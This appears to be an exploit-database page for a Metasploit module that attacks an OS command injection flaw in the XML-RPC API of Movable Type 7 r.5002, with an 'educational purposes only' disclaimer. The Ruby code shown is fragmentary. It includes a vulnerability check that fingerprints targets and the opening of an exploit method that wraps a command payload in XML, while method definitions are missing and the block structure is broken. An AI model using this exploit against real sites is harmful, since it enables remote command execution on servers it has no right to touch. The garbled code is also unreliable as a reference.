Movable type 7 r.5002 xmlrpc api os command injection (metasploit) Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2021-10-29 |
Type : webapps |
Platform : cgi
This exploit / vulnerability Movable type 7 r.5002 xmlrpc api os command injection (metasploit) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") if res.code != 200
if res && res.body.include?("Can't locate "+fingerprint)
return Exploit::CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
end
Exploit::CheckCode::Safe
end
def exploit
begin
command_payload = cmd_to_xml(payload.raw)